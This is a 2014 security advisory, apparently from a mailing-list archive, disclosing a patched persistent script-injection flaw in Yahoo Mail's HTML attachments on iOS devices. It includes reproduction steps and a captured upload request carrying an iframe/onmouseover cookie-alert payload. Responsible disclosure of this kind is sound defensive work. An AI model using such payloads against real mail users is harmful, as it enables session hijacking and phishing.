[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability

Document Title:
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Product & Service Introduction:
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely 
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, 
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports 
and its social media website. It is one of the most popular sites in the United States. According to news sources, 
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a 
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )

Abstract Advisory Information:
The Vulnerability-Laboratory Research Team has discovered a persistent input validation vulnerability in the official Yahoo! Mail Service web-application.

Vulnerability Disclosure Timeline:
2013-11-08:	Researcher Notification & Coordination (Ateeq ur Rehman Khan - Core Research Team)
2013-11-09:	Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18:	Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program)
2014-06-01:	Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Program)
2014-07-08:	Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Affected Product(s):
Product: Yahoo! Mail - Web Application & API 2013 Q3

Exploitation Technique:

Severity Level:

Technical Details & Description:
A persistent script code inject web vulnerability has been discovered in the official Yahoo Mail Service web-application & API. 
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad and iPod touch. The vulnerability allows attackers 
to upload / attach own malicious .html files and send them to other Yahoo users.

During the testing, it was discovered that using Yahoo mail, it is possible to include malicious script code within .html files 
and send them as attachments to other users. It seems that the application is not performing proper validation When uploading 
user attached files. Upon viewing these attached files from your iphone/ipad device, the malicious script code gets executed 
directly hence leaving the victims vulnerable to persistent client side attacks.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) 
count of 5.3. Exploitation of this vulnerability requires low user interaction. Successful exploitation of this vulnerability 
results in persistent phishing, persistent client side redirects, user session hijacking and similar client side attacks.

Request Method(s):
				[+] POST

Vulnerable Application(s):
				[+] Yahoo! Mail - Web Application

Vulnerable Module(s): 
                                [+] Compose Mail > File Attachments

Vulnerable Parameter(s):
                                [+] Attach File

Proof of Concept (PoC):
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web application 
account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information 
and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo test account 
6. Using your iPad/iPhone device, click on the attachment link of the newly received POC email
7. You should now see an iframe with vulnerability labs website proving the existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!

--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=---------------------------234701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Disposition: form-data; name="filename
Content-Disposition: form-data; name="filesize"
Content-Disposition: form-data; name="Filedata"; filename="POC.html"
Content-Type: text/html
'%3d'>"><iframe src='http://www.vulnerability-lab.com' onmouseover=alert(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml";, CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi 
Server: HTTP/1.1 UserFiberFramework/1.0 
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 

<?xml version="1.0" encoding="UTF-8"?><Response>  <attachment>    <code>uploadAVNoVirus</code>    
<id>e2fd91b75b55018624eef056c5913b0f</id>    <name>POC.html</name>    <type>text/html</type>    
<size>126</size>  </attachment></Response><!-- web162405.mail.bf1.yahoo.com compressed/chunked Fri Nov  8 11:12:53 PST 2013


Solution - Fix & Patch:
Proper security controls should be implemented/enforced in the file attachment module to validate inputs and to persistent script code executions.

Security Risk:
The security risk of persistent input validation web vulnerability in the yahoo mail service application is estimated as medium.

Credits & Authors:
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx 	- research@xxxxxxxxxxxxxxxxxxxxx 	       		- admin@xxxxxxxxxxxxxxxxx
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx